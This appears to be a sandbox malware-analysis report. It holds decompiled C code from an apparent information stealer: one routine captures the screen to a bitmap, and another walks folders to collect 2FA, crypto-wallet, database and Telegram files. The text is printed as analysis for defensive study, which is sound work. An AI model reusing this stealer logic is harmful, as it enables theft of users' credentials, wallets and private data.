                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4cfbedb73f701c7b0f26c931164b435e6c0e418a1c9cfb51c27ae1477d8c3af
                                                  • Instruction ID: 17ba68870e243ed6d02f8d50b767f16c5fe09bc06d238aef0b074dbf1231f1a5
                                                  • Opcode Fuzzy Hash: b4cfbedb73f701c7b0f26c931164b435e6c0e418a1c9cfb51c27ae1477d8c3af
                                                  • Instruction Fuzzy Hash: 10D0ECB0C2430DDED740EFB9850535EBAF0AB04240F50897AC514E2200E7B542118F96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *
                                                  • API String ID: 0-163128923
                                                  • Opcode ID: de043e402b596624529153e91cfc29cdce30aee16c052809904a6553098e9312
                                                  • Instruction ID: 56d3818fdc8960931777f73a81b02653cd29b451d859e15f4e173a5012a08287
                                                  • Opcode Fuzzy Hash: de043e402b596624529153e91cfc29cdce30aee16c052809904a6553098e9312
                                                  • Instruction Fuzzy Hash: C9D1BBB171020ACFEB25DB7AC560BAAB7E6AF89300F54447DD246CB291DF38E901CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65c3f8e2a5d4f6bf217bf8ce22bcc78414fe5e4efc9dddcda4d7e168d3bcd162
                                                  • Instruction ID: e2f3c22259a93e492bddbf87dc0af27478b5503b0857f2c7747c19f755a3fd29
                                                  • Opcode Fuzzy Hash: 65c3f8e2a5d4f6bf217bf8ce22bcc78414fe5e4efc9dddcda4d7e168d3bcd162
                                                  • Instruction Fuzzy Hash: 2812D7F1C917468AD732CF66E8C81893BA0B7643A8FD04A08D2711BED9D7B8156ECF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a371baa102028efcc287c697e631f55978795f9a82a058055b7fb6d21633622c
                                                  • Instruction ID: 168e51d7066ba3e697707ca8af43458d9545e822422eface32c8c7b3f279f302
                                                  • Opcode Fuzzy Hash: a371baa102028efcc287c697e631f55978795f9a82a058055b7fb6d21633622c
                                                  • Instruction Fuzzy Hash: A5D1A374B106098FDB14DF69C598AA9B7F1BF8D705F2580B8E50AAB362DB31AD40CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9d03e39a131bf73bb42530a4398d6fe4f87205cec9339425206866c6a50d2b6
                                                  • Instruction ID: bb96a678e200c8bf49b807a5b81b5d22271f83d380d890c59d2c84cf408e9b64
                                                  • Opcode Fuzzy Hash: d9d03e39a131bf73bb42530a4398d6fe4f87205cec9339425206866c6a50d2b6
                                                  • Instruction Fuzzy Hash: 84A15B32E006198FCF05EFB6C98459EBBF2FF89304B15856AE905AB261DF31A955CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34a94bed585da01f90fc31ac44a936605fd5d1d7fa2c282357c1bab887d0eafa
                                                  • Instruction ID: c6f3c3611ff50417012530bd89caeeebff22d6111202524ca61733ad8e28ac27
                                                  • Opcode Fuzzy Hash: 34a94bed585da01f90fc31ac44a936605fd5d1d7fa2c282357c1bab887d0eafa
                                                  • Instruction Fuzzy Hash: 27C12DF1C917468BD722CF66E8C81893BA1FB653A4FD04B08D2612BED8D7B4146ACF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage: 28.2%
                                                  Dynamic/Decrypted Code Coverage: 0%
                                                  Signature Coverage: 33%
                                                  Total number of Nodes: 348
                                                  Total number of Limit Nodes: 8

                                                  Control-flow Graph

                                                  C-Code - Quality: 97%
                                                  			E00404868(char _a4) {
                                                  				short _v8;
                                                  				char _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				int _v24;
                                                  				void* _v28;
                                                  				struct HDC__* _v32;
                                                  				short _v36;
                                                  				short _v38;
                                                  				short _v40;
                                                  				short _v42;
                                                  				short _v44;
                                                  				short _v46;
                                                  				char _v48;
                                                  				int _v52;
                                                  				int _v56;
                                                  				intOrPtr _v62;
                                                  				char _v72;
                                                  				signed int _v96;
                                                  				short _v98;
                                                  				short _v100;
                                                  				signed int _v104;
                                                  				intOrPtr _v108;
                                                  				void _v112;
                                                  				signed int _v128;
                                                  				int _v132;
                                                  				void _v136;
                                                  				struct tagBITMAPINFO _v180;
                                                  				void* _t58;
                                                  				int _t59;
                                                  				int _t60;
                                                  				int _t68;
                                                  				signed int _t69;
                                                  				short _t73;
                                                  				void* _t78;
                                                  				struct HDC__* _t84;
                                                  				void* _t87;
                                                  				short _t96;
                                                  				short _t97;
                                                  				short _t98;
                                                  				short _t99;
                                                  				short _t100;
                                                  				short _t101;
                                                  				struct HDC__* _t110;
                                                  				signed int _t116;
                                                  				int _t134;
                                                  				int _t136;
                                                  				struct HDC__* _t140;
                                                  				void* _t141;
                                                  				void* _t145;
                                                  				void* _t147;
                                                  
                                                  				if(_a4 == 0) {
                                                  					return _t58;
                                                  				}
                                                  				_v12 = 0x33696467;
                                                  				_t3 =  &_v12; // 0x33696467
                                                  				_v8 = 0x32;
                                                  				_t59 = E0040439A(_t3, 0x408000);
                                                  				if(_t59 != 0xa) {
                                                  					L16:
                                                  					return _t59;
                                                  				}
                                                  				_v28 = 0;
                                                  				_t60 = GetSystemMetrics(0x4c); // executed
                                                  				_v56 = _t60;
                                                  				_v52 = GetSystemMetrics(0x4d);
                                                  				E0040355E( &_v72, 0, 0xe);
                                                  				E0040355E( &_v112, 0, 0x28);
                                                  				E0040355E( &_v180, 0, 0x2c);
                                                  				_t134 = 0x18;
                                                  				E0040355E( &_v136, 0, _t134);
                                                  				_t59 = GetDC(0);
                                                  				_t110 = _t59;
                                                  				if(_t110 == 0) {
                                                  					L15:
                                                  					goto L16;
                                                  				}
                                                  				_t145 = GetCurrentObject(_t110, 7);
                                                  				if(_t145 != 0) {
                                                  					_t68 = GetObjectW(_t145, _t134,  &_v136);
                                                  					_t157 = _t68;
                                                  					if(_t68 != 0) {
                                                  						_t69 = _v128;
                                                  						_t136 = _v132;
                                                  						_push(_t69);
                                                  						_v24 = _t136;
                                                  						_v16 = _t69;
                                                  						E004035C3(_t157, 0, "- ScreenSize: {lWidth=%d, lHeight=%d}\r\n", _t136);
                                                  						DeleteObject(_t145); // executed
                                                  						_v96 = _v96 & 0x00000000;
                                                  						_v72 = 0x4d42;
                                                  						_t73 = 0x18;
                                                  						_v98 = _t73;
                                                  						_v108 = _t136;
                                                  						_v100 = 1;
                                                  						_v104 = _v16;
                                                  						_t116 = 0xa;
                                                  						_v112 = 0x28;
                                                  						_t78 = memcpy( &_v180,  &_v112, _t116 << 2);
                                                  						_v62 = 0x36;
                                                  						asm("cdq");
                                                  						_v20 = ((_t78 + 0x0000001f & 0xffffffe0) >> 3) * _v16;
                                                  						_t84 = CreateCompatibleDC(_t110); // executed
                                                  						_t140 = _t84;
                                                  						_v32 = _t140;
                                                  						if(_t140 != 0) {
                                                  							_t87 = CreateDIBSection(_t110,  &_v180, 0,  &_v28, 0, 0); // executed
                                                  							_t147 = _t87;
                                                  							if(_t147 != 0) {
                                                  								if(SelectObject(_t140, _t147) != 0 && BitBlt(_t140, 0, 0, _v24, _v16, _t110, _v56, _v52, 0xcc0020) != 0) {
                                                  									_t141 = E004034F0(_v20 + 0x37);
                                                  									if(_t141 != 0) {
                                                  										E00403533(_t141,  &_v72, 0xe);
                                                  										_t42 = _t141 + 0xe; // 0xe
                                                  										E00403533(_t42,  &_v180, 0x28);
                                                  										_t46 = _t141 + 0x36; // 0x36
                                                  										E00403533(_t46, _v28, _v20);
                                                  										_t96 = 0x24;
                                                  										_v48 = _t96;
                                                  										_t97 = 0x73;
                                                  										_v46 = _t97;
                                                  										_t98 = 0x2e;
                                                  										_t50 =  &_a4; // 0x33696467
                                                  										_v44 = _t98;
                                                  										_t99 = 0x62;
                                                  										_v42 = _t99;
                                                  										_t100 = 0x6d;
                                                  										_v40 = _t100;
                                                  										_t101 = 0x70;
                                                  										_v38 = _t101;
                                                  										_v36 = 0;
                                                  										E00403D26( *_t50,  &_v48, _t141, _v20 + 0x36); // executed
                                                  										E0040351E(_t141);
                                                  									}
                                                  									_t140 = _v32;
                                                  								}
                                                  								DeleteObject(_t147);
                                                  							}
                                                  							DeleteDC(_t140);
                                                  						}
                                                  					}
                                                  				}
                                                  				_t59 = ReleaseDC(0, _t110);
                                                  				goto L15;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0040439A: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,004044D8), ref: 004043AC
                                                    • Part of subcall function 0040439A: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,004044D8), ref: 004043B9
                                                  • KiUserCallbackDispatcher.NTDLL ref: 004048AD
                                                  • GetSystemMetrics.USER32 ref: 004048B4
                                                  • GetDC.USER32(00000000), ref: 004048EF
                                                  • GetCurrentObject.GDI32(00000000,00000007), ref: 00404902
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0040491B
                                                  • DeleteObject.GDI32(00000000), ref: 00404947
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 004049A8
                                                  • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004049CC
                                                  • SelectObject.GDI32(00000000,00000000), ref: 004049DE
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00404A03
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                    • Part of subcall function 00403D26: EnterCriticalSection.KERNEL32(004084D4,?,?), ref: 00403D38
                                                    • Part of subcall function 0040351E: GetProcessHeap.KERNEL32(00000000,00000000,00403026,?,?,?,?,?,?,?,?,?,?,?,004035DC,?), ref: 00403525
                                                    • Part of subcall function 0040351E: RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,004035DC,?,00000400,?), ref: 0040352C
                                                  • DeleteObject.GDI32(00000000), ref: 00404A9D
                                                  • DeleteDC.GDI32(00000000), ref: 00404AA4
                                                  • ReleaseDC.USER32 ref: 00404AAD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: Object$HeapSection$CriticalDelete$CreateEnterProcess$AllocateCallbackCompatibleCurrentDispatcherFreeHandleLeaveLibraryLoadMetricsModuleReleaseSelectSystemUser
                                                  • String ID: ($- ScreenSize: {lWidth=%d, lHeight=%d}$2$6$gdi3$gdi32
                                                  • API String ID: 1387450592-4111540656
                                                  • Opcode ID: e9d44fd7d4d727d46ae51d1360d3aa32c12e10f9a846aa79e8bcbac72c5deca9
                                                  • Instruction ID: 0dba1ea29456e54c154a4f85a3165c6553c312b31bc60dfa30d2f7dc54768a5e
                                                  • Opcode Fuzzy Hash: e9d44fd7d4d727d46ae51d1360d3aa32c12e10f9a846aa79e8bcbac72c5deca9
                                                  • Instruction Fuzzy Hash: 6A618072E40208ABDB10DFA5DD45BEEBBB9EF84710F10402AE605B72D1DB789A05CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 89%
                                                  			E00401000(intOrPtr __ecx, intOrPtr __edx, signed short _a4) {
                                                  				intOrPtr _v12;
                                                  				signed int _v16;
                                                  				intOrPtr _v20;
                                                  				signed short _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				signed short _v36;
                                                  				signed short _v40;
                                                  				void* _v44;
                                                  				short _v82;
                                                  				short _v84;
                                                  				short _v86;
                                                  				short _v88;
                                                  				short _v90;
                                                  				short _v92;
                                                  				short _v94;
                                                  				char _v96;
                                                  				signed int _v100;
                                                  				char _v104;
                                                  				signed int _v108;
                                                  				char _v112;
                                                  				signed int _v116;
                                                  				char _v120;
                                                  				signed int _v124;
                                                  				char _v128;
                                                  				signed int _v132;
                                                  				char _v136;
                                                  				signed int _v140;
                                                  				char _v144;
                                                  				signed int _v148;
                                                  				intOrPtr _v152;
                                                  				char _v156;
                                                  				short _v188;
                                                  				short _v190;
                                                  				short _v192;
                                                  				short _v194;
                                                  				short _v196;
                                                  				short _v198;
                                                  				short _v200;
                                                  				short _v202;
                                                  				short _v204;
                                                  				short _v206;
                                                  				char _v208;
                                                  				short _v246;
                                                  				short _v248;
                                                  				short _v250;
                                                  				short _v252;
                                                  				short _v254;
                                                  				short _v256;
                                                  				short _v258;
                                                  				char _v260;
                                                  				struct _WIN32_FIND_DATAW _v856;
                                                  				short _t165;
                                                  				short _t166;
                                                  				short _t167;
                                                  				short _t168;
                                                  				short _t169;
                                                  				short _t171;
                                                  				short _t172;
                                                  				short _t173;
                                                  				short _t174;
                                                  				short _t175;
                                                  				short _t177;
                                                  				short _t178;
                                                  				short _t179;
                                                  				short _t180;
                                                  				void* _t184;
                                                  				void* _t188;
                                                  				void* _t189;
                                                  				int _t193;
                                                  				void* _t197;
                                                  				signed short _t206;
                                                  				signed short _t208;
                                                  				signed short _t211;
                                                  				signed short _t213;
                                                  				signed short _t214;
                                                  				short _t226;
                                                  				signed short _t236;
                                                  				signed short _t245;
                                                  				signed short _t252;
                                                  				signed short _t260;
                                                  				short _t265;
                                                  				signed short _t273;
                                                  				signed short _t276;
                                                  				intOrPtr _t277;
                                                  				signed short _t278;
                                                  				short _t285;
                                                  				short _t286;
                                                  				short _t287;
                                                  				signed int _t321;
                                                  				signed short _t350;
                                                  				char* _t360;
                                                  				short _t378;
                                                  				WCHAR* _t391;
                                                  				void* _t406;
                                                  				signed short _t412;
                                                  				intOrPtr _t413;
                                                  				WCHAR* _t422;
                                                  				signed short _t426;
                                                  				void* _t430;
                                                  				void* _t432;
                                                  				void* _t433;
                                                  
                                                  				_t277 = __ecx;
                                                  				_t160 = __edx;
                                                  				_v28 = __edx;
                                                  				_v20 = __ecx;
                                                  				if(__ecx == 0 ||  *0x40802c == 0x81f39c19) {
                                                  					L22:
                                                  					return _t160;
                                                  				} else {
                                                  					_t160 = E0040402B(__edx);
                                                  					if(__edx == 0) {
                                                  						goto L22;
                                                  					}
                                                  					_t422 = E004034F0(0x208);
                                                  					_t424 = E004034F0(0x208);
                                                  					_v12 = _t424;
                                                  					if(_t422 == 0) {
                                                  						L21:
                                                  						E0040351E(_t422);
                                                  						return E0040351E(_t424);
                                                  					}
                                                  					_t441 = _t424;
                                                  					if(_t424 == 0) {
                                                  						goto L21;
                                                  					}
                                                  					_t165 = 0x32;
                                                  					_v260 = _t165;
                                                  					_t166 = 0x46;
                                                  					_v258 = _t166;
                                                  					_t167 = 0x41;
                                                  					_v256 = _t167;
                                                  					_t168 = 0x75;
                                                  					_t378 = 0x74;
                                                  					_v254 = _t168;
                                                  					_t169 = 0x68;
                                                  					_t285 = 0x2f;
                                                  					_v250 = _t169;
                                                  					_v246 = 0;
                                                  					_t171 = 0x43;
                                                  					_v96 = _t171;
                                                  					_t172 = 0x72;
                                                  					_v94 = _t172;
                                                  					_t173 = 0x79;
                                                  					_v92 = _t173;
                                                  					_t174 = 0x70;
                                                  					_v90 = _t174;
                                                  					_t175 = 0x6f;
                                                  					_v86 = _t175;
                                                  					_v82 = 0;
                                                  					_t177 = 0x44;
                                                  					_v248 = _t285;
                                                  					_v84 = _t285;
                                                  					_t286 = 0x61;
                                                  					_v208 = _t177;
                                                  					_t178 = 0x62;
                                                  					_v206 = _t286;
                                                  					_v202 = _t286;
                                                  					_v198 = _t286;
                                                  					_t287 = 0x73;
                                                  					_v200 = _t178;
                                                  					_t179 = 0x65;
                                                  					_v194 = _t179;
                                                  					_t180 = 0x2f;
                                                  					_v190 = _t180;
                                                  					_v252 = _t378;
                                                  					_v88 = _t378;
                                                  					_v204 = _t378;
                                                  					_v196 = _t287;
                                                  					_v192 = _t287;
                                                  					_v188 = 0;
                                                  					E004035E8(_t441, _t422, L"%s\\*", _v28);
                                                  					_t433 = _t432 + 0xc;
                                                  					_t184 = FindFirstFileW(_t422,  &_v856); // executed
                                                  					_v44 = _t184;
                                                  					if(_t184 == 0xffffffff) {
                                                  						L20:
                                                  						E0040355E( &_v208, 0, 0x32);
                                                  						E0040355E( &_v260, 0, 0x32);
                                                  						E0040355E( &_v96, 0, 0x32);
                                                  						goto L21;
                                                  					} else {
                                                  						goto L6;
                                                  					}
                                                  					do {
                                                  						L6:
                                                  						_t188 = E00403623(_v28);
                                                  						_t189 = E00403623( &(_v856.cFileName));
                                                  						_t443 = _t189 + 3 + _t188 - 0x104;
                                                  						if(_t189 + 3 + _t188 >= 0x104) {
                                                  							L18:
                                                  							_t424 = _v12;
                                                  							goto L19;
                                                  						}
                                                  						_push( &(_v856.cFileName));
                                                  						E004035E8(_t443, _t422, L"%s\\%s", _v28);
                                                  						_t433 = _t433 + 0x10;
                                                  						if((_v856.dwFileAttributes & 0x00000010) == 0 || E00403713( &(_v856.cFileName), L"..") == 0 || E00403713( &(_v856.cFileName), ".") == 0) {
                                                  							__eflags = _v856.dwFileAttributes & 0x000000a7;
                                                  							if((_v856.dwFileAttributes & 0x000000a7) == 0) {
                                                  								goto L18;
                                                  							}
                                                  							_t197 = E00403B10( &(_v856.cFileName), E00403623( &(_v856.cFileName)) + _t196);
                                                  							__eflags = _t197 - 0xe982779a;
                                                  							if(_t197 != 0xe982779a) {
                                                  								__eflags = _t197 - 0x6666aed0;
                                                  								if(_t197 == 0x6666aed0) {
                                                  									L113:
                                                  									__eflags = _a4;
                                                  									_t424 = _v12;
                                                  									_t296 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
                                                  									_t199 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
                                                  									_t200 = (( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff) + 1;
                                                  									_push( &(_t422[(( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff) + 1]));
                                                  									E004035E8(__eflags, _v12, L"%s%s",  &_v208);
                                                  									E00403E66(_t277, _t422, __eflags, _t424); // executed
                                                  									_t433 = _t433 + 0x14;
                                                  									goto L19;
                                                  								}
                                                  								__eflags = _t197 - 0x3cd9c812;
                                                  								if(_t197 == 0x3cd9c812) {
                                                  									goto L113;
                                                  								}
                                                  								__eflags = _t197 - 0xdc914064;
                                                  								if(_t197 == 0xdc914064) {
                                                  									goto L113;
                                                  								}
                                                  								__eflags = _t197 - 0xac951682;
                                                  								if(_t197 == 0xac951682) {
                                                  									goto L113;
                                                  								}
                                                  								__eflags = _t197 - 0xaffeac1b;
                                                  								if(_t197 == 0xaffeac1b) {
                                                  									goto L113;
                                                  								}
                                                  								__eflags = _t197 - 0x775d28f9;
                                                  								if(_t197 == 0x775d28f9) {
                                                  									goto L113;
                                                  								}
                                                  								__eflags = _t197 - 0x8734ec8c;
                                                  								if(_t197 == 0x8734ec8c) {
                                                  									goto L113;
                                                  								}
                                                  								__eflags = _t197 - 0x7d9821e0;
                                                  								if(_t197 == 0x7d9821e0) {
                                                  									goto L113;
                                                  								}
                                                  								__eflags = _t197 - 0x4b9eec12;
                                                  								if(_t197 == 0x4b9eec12) {
                                                  									goto L113;
                                                  								}
                                                  								__eflags = _t197 - 0x50a36ede;
                                                  								if(_t197 == 0x50a36ede) {
                                                  									goto L113;
                                                  								}
                                                  								__eflags = _t197 - 0xb525bd34;
                                                  								if(__eflags != 0) {
                                                  									goto L18;
                                                  								}
                                                  								_v16 = _v16 & 0x00000000;
                                                  								_t206 = E00404186(__eflags, _t422,  &_v16); // executed
                                                  								_t278 = _t206;
                                                  								__eflags = _t278;
                                                  								if(_t278 == 0) {
                                                  									goto L29;
                                                  								}
                                                  								_t426 = _v16;
                                                  								__eflags = _t426;
                                                  								if(_t426 == 0) {
                                                  									goto L29;
                                                  								}
                                                  								_push(_t426);
                                                  								_push(0x344ce79b);
                                                  								_t406 = 0x11;
                                                  								_t208 = E004036D9(_t278, _t406);
                                                  								_v24 = _t208;
                                                  								__eflags = _t208 - 0xffffffff;
                                                  								if(_t208 == 0xffffffff) {
                                                  									goto L29;
                                                  								}
                                                  								_t134 = _t208 + 0x11; // 0x11
                                                  								__eflags = E004036D9(_t134 + _t278, 1, 0x762ae69, _t426) - 0xffffffff;
                                                  								if(__eflags == 0) {
                                                  									goto L29;
                                                  								}
                                                  								_t427 = E00403684(_t278, _v24 + 0x11, __eflags, _t209);
                                                  								_v36 = _t427;
                                                  								__eflags = _t427;
                                                  								if(_t427 == 0) {
                                                  									goto L29;
                                                  								}
                                                  								_t211 = E0040360D(_t427);
                                                  								_v24 = _t211;
                                                  								__eflags = _t211;
                                                  								if(_t211 != 0) {
                                                  									_t213 = E00401A55(_t427, _t211,  &_v24);
                                                  									_v40 = _t213;
                                                  									__eflags = _t213;
                                                  									if(_t213 != 0) {
                                                  										_t412 = _v24;
                                                  										__eflags = _t412;
                                                  										if(_t412 != 0) {
                                                  											_t413 = _t412 + 0xfffffffb;
                                                  											_t141 = _t213 + 5; // 0x5, executed
                                                  											_t214 = E00401C87(_t141, _t413); // executed
                                                  											_t316 = _t413;
                                                  											_v32 = _t413;
                                                  											__eflags = _t214;
                                                  											if(_t214 != 0) {
                                                  												_t428 = E00401B98(_t316, _t214,  &_v24);
                                                  												__eflags = _a4;
                                                  												_t417 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
                                                  												_t320 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
                                                  												_t321 = (( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff) + 1;
                                                  												__eflags = _t321;
                                                  												_push( &(_t422[_t321]));
                                                  												E004035E8(_t321, _v12, L"%s%s",  &_v208);
                                                  												E00403D26(_v20, _v12, _t216, _v24); // executed
                                                  												_t433 = _t433 + 0x18;
                                                  												E0040351E(_t428);
                                                  												E0040351E(_v32);
                                                  												_t427 = _v36;
                                                  											}
                                                  											E0040351E(_v40);
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L28;
                                                  							}
                                                  							_t429 = E004034F0(0x208);
                                                  							__eflags = _a4;
                                                  							_v84 = 0;
                                                  							_t420 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
                                                  							_t328 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
                                                  							_push( &(_t422[( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff]));
                                                  							E004035E8(__eflags, _t222, L"%s%s",  &_v96);
                                                  							_t226 = 0x2f;
                                                  							_v84 = _t226;
                                                  							E00403E66(_t277, _t422, __eflags, _t429);
                                                  							_t433 = _t433 + 0x14;
                                                  							goto L36;
                                                  						} else {
                                                  							_t430 = E00403B10( &(_v856.cFileName), E00403623( &(_v856.cFileName)) + _t231);
                                                  							if(_t430 == 0x82dfed94 || _t430 == 0xbd47e091 || _t430 == 0x44b776ce) {
                                                  								_v148 = _v148 & 0x00000000;
                                                  								_v16 = _v16 & 0x00000000;
                                                  								_v156 = 0x3d3f6137;
                                                  								_v152 = 0x3887818b;
                                                  								_t278 = E00404068( &_v156, _t422,  &_v16);
                                                  								__eflags = _t278;
                                                  								if(_t278 != 0) {
                                                  									_t236 = E00403713(_t278, _t422);
                                                  									__eflags = _t236;
                                                  									if(_t236 != 0) {
                                                  										__eflags = _t430 - 0x44b776ce;
                                                  										_t238 =  !=  ?  &_v96 :  &_v260;
                                                  										__eflags = _a4;
                                                  										_t341 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
                                                  										_t240 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
                                                  										E00403EAA(_v20, _t278, _a4, ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff,  !=  ?  &_v96 :  &_v260, 0);
                                                  										_t433 = _t433 + 0xc;
                                                  										 *0x4084ca =  *0x4084ca + 1;
                                                  									}
                                                  								}
                                                  								goto L29;
                                                  							} else {
                                                  								if(_t430 == 0x23f2e218 || _t430 == 0x2d3640ab) {
                                                  									EnterCriticalSection(0x4084d4);
                                                  									E00404ABC(_t277, _t422, 1, L"Telegram");
                                                  									LeaveCriticalSection(0x4084d4);
                                                  									goto L18;
                                                  								} else {
                                                  									if(_t430 != 0xaf49b59a) {
                                                  										__eflags = _t430 - 0x141f21c1;
